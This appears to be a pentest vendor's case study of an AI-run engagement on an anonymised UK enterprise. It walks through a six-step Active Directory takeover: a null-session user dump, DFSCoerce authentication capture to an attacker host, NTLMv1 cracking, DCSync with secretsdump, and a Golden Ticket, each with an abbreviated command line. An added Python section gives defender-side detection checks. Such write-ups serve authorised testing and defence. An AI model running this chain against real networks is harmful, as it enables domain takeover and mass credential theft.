
NEBULA IN THE WILD
How a Real Engagement Runs

Real Breachline engagements — how Nebula tested, the surfaces it covered, and the outcome. Client details are fully anonymised: no names, sectors, domains, IPs, or data.

1 Real Engagement · 100+ Findings (Last Engagement) · 0 False Positives · 24/7 Continuous Testing
The Challenge

What the client needed and where their tooling fell short.

What Nebula Did

The methodology and, where relevant, the proven exploit chain.

Areas Covered

The surfaces and categories tested, end to end.

Enterprise
UK Enterprise (anonymised)
Full-Spectrum · Web · Internal · AD · Black-Box · Proven Exploits

Full-Spectrum Assessment — External, Web & Internal

We were asked to test a UK enterprise end to end: their public website, their external footprint, and a sizeable internal Windows and Linux estate running Active Directory. Nebula ran the whole engagement on its own and came back with more than 100 issues — every one backed by evidence.

100+ Findings: across external, web & internal
3 Surfaces Tested: External · Web · Internal / AD
Domain Admin Achieved: full AD compromise, confirmed
0 False Positives: every finding evidenced

The Challenge

Like a lot of fast-growing businesses, they'd outgrown their tooling. Scanners covered the obvious external surface, but nobody had taken a proper look at the internal network or Active Directory in a while. They didn't want another wall of CVSS numbers — they wanted to know what a real attacker could actually do, and what to fix first.

What Nebula Did

Nebula went in black-box, with no inside knowledge, and worked across all three fronts at once. It mapped the attack surface, picked the right specialist for each job, ran real offensive tooling in a throwaway sandbox, and stitched individual weaknesses into full attack paths. Nothing destructive — and every finding came with the proof to back it up.

1
External & OSINT

Mapped the public footprint, exposed services, and edge configuration from the outside in — zero prior knowledge.

2
Web Application

Authenticated and unauthenticated testing of the customer portal — auth, access control, injection, and business logic.

3
Internal & Active Directory

Assessed the internal Windows/Linux estate and AD — access, identity, segmentation, and privilege paths.

4
Prove & Report

Every finding validated with a real, non-destructive proof in a sandbox, scored with CVSS 4.0, and mapped to remediation.

Proof — Full Domain Takeover · Confirmed · Executed

From a single low-privileged account — no admin rights — Nebula chained six real weaknesses into full Active Directory compromise, executed live and non-destructively on production.

1
Low-privileged foothold · TA0001 · Initial Access

Started from a single low-privileged domain account on an internal segment — no administrative rights at the outset.

# low-privileged domain user · no admin rights
2
Anonymous enumeration · T1087 · Account Discovery

An unauthenticated SMB null session on a domain controller returned the full domain user list — hundreds of accounts, with descriptions that flagged the privileged ones.

nxc smb <dc> -u '' -p '' --users → 490 domain users
3
Coercion → DC auth capture · T1187 · Forced Authentication

DFSCoerce (MS-DFSNM) forced the domain controller’s machine account to authenticate to an attacker host; Responder captured its NetNTLMv1.

coercer coerce -t <dc> -l <atk> -u <low-priv> + responder → NetNTLMv1 of <dc>$
4
Machine-account hash recovery · T1110 · Credential Cracking

The NetNTLMv1 response (static challenge) was cracked to recover the domain controller’s machine-account NT hash.

NTLMv1 (static challenge) → crack → <dc>$ NT hash
5
Pass-the-hash DCSync · T1003.006 · DCSync

Pass-the-hash as the DC machine account ran a DCSync that pulled every domain account hash, including krbtgt — all reached from the low-privileged start.

impacket-secretsdump -hashes :<dc$-hash> <domain>/<dc>$@<dc> -just-dc → 7,820 hashes incl. krbtgt
6
Golden Ticket — validated live · T1558.001 · Golden Ticket

A Golden Ticket forged offline from the krbtgt AES256 key (unrotated ~10 years) was validated live against the production domain controller — full ADMIN$/C$/SYSVOL access — then deleted per cleanup rules.

ticketer.py -aesKey <krbtgt> + smbclient.py -k -no-pass <dc> → Domain Admin on production DC

Executed live on production (2026-05-14) from a single low-privileged account — no admin credentials at the start. The coercion → hash-recovery → pass-the-hash DCSync chain ran in about a minute (~15:00 BST); the Golden Ticket was forged and validated live against the production domain controller (11:12 BST), then deleted with no persistent artefacts. All identifiers (domain, hosts, IPs, accounts) are masked.
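The three weaknesses the chain above rests on (NTLMv1 still negotiable, replication rights exercised from a non-DC host, and a krbtgt key that was never rotated) are all checkable from the defender's side. The script below is an added example, not Breachline's or Nebula's code; the event records are a constructed, simplified stand-in for Windows Security log fields (4624 logon, 4662 directory-object access), and the host/address values are made up. Note the correlation by logon ID: a 4662 event carries no network address, so filtering on account alone would miss step 5, where the DCSync is issued as the DC's own machine account but from an attacker-controlled host.

```python
"""Added example (not Breachline/Nebula code): defender-side checks for the
weaknesses the chain above relied on. Event dicts are a constructed, simplified
stand-in for Windows Security log fields (4624 logon, 4662 directory access)."""
from datetime import date

# Extended-rights GUIDs a DCSync (directory replication) request exercises.
REPLICATION_GUIDS = ("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",   # Get-Changes
                     "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")   # Get-Changes-All

# Constructed sample events. The logon ID links a 4662 back to the 4624 that
# carries the source address, because 4662 itself has no network field.
SAMPLE_EVENTS = [
    {"id": 4624, "account": "svc-backup", "logon_id": "0x1a", "package": "NTLM V1", "src": "10.0.0.21"},
    {"id": 4624, "account": "DC02$", "logon_id": "0x2b", "package": "Kerberos", "src": "10.0.0.11"},
    {"id": 4662, "account": "DC02$", "logon_id": "0x2b", "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 4624, "account": "DC01$", "logon_id": "0x3c", "package": "NTLM V2", "src": "10.0.0.99"},
    {"id": 4662, "account": "DC01$", "logon_id": "0x3c", "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]
# Known domain controllers: machine account -> its own address (constructed).
DC_HOSTS = {"DC01$": "10.0.0.10", "DC02$": "10.0.0.11"}

def ntlmv1_logons(events):
    """Accounts still authenticating with NTLMv1 (steps 3 and 4 depend on it)."""
    return sorted({e["account"] for e in events
                   if e["id"] == 4624 and e.get("package") == "NTLM V1"})

def suspicious_replication(events, dc_hosts):
    """Replication requests not issued by a real DC from its own address.
    Checking the account alone misses the pass-the-hash case in step 5: the
    request is made *as* DC01$, but from a host that is not DC01."""
    src_by_logon = {e["logon_id"]: e["src"] for e in events if e["id"] == 4624}
    hits = []
    for e in events:
        if e["id"] != 4662 or not any(g in e["properties"] for g in REPLICATION_GUIDS):
            continue
        src = src_by_logon.get(e["logon_id"], "unknown")
        if dc_hosts.get(e["account"]) != src:
            hits.append((e["account"], src))
    return hits

def krbtgt_rotation_overdue(pwd_last_set_iso, today_iso, max_days=180):
    """True when krbtgt has not been rotated within max_days (step 6 relied on a
    key unrotated for ~10 years). Reset it twice, at least 10 hours apart, so
    tickets under the old key expire before the previous key is dropped."""
    return (date.fromisoformat(today_iso) - date.fromisoformat(pwd_last_set_iso)).days > max_days

if __name__ == "__main__":
    print(ntlmv1_logons(SAMPLE_EVENTS))                       # ['svc-backup']
    print(suspicious_replication(SAMPLE_EVENTS, DC_HOSTS))    # [('DC01$', '10.0.0.99')]
    print(krbtgt_rotation_overdue("2016-05-01", "2026-05-14"))  # True
```

In a real estate the same three checks map to LmCompatibilityLevel (NTLMv1 refused at level 3 or above), alerting on 4662 with these GUIDs from any logon not sourced at a DC address, and a scheduled krbtgt pwdLastSet review.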

Areas Covered

Web Application

Authentication, access control, injection, and multi-step business-logic testing.

Active Directory & Identity

Anonymous access, coercion surfaces, account hygiene, and privilege paths.

Network & Exposed Services

Open ports, cleartext protocols, unauthenticated data stores, and management interfaces.

Sensitive Data Exposure

Over-permissive files and logs containing sensitive operational data.

Hardening & Patch Hygiene

Password policy, end-of-life software, security headers, and misconfiguration.

External Footprint

Edge/WAF bypass exposure, header gaps, and information disclosure.

The full engagement produced 100+ findings with reproducible proof-of-concept steps, CVSS 4.0 scoring, and remediation mapped to OWASP, PCI-DSS, ISO 27001, and NIST — delivered as a board- and auditor-ready report.

See What Nebula Finds in Your Infrastructure

Nebula starts with zero knowledge and attacks from the outside in — across web, mobile, cloud, APIs, internal networks, and infrastructure. Every finding is real, exploitable, and proven.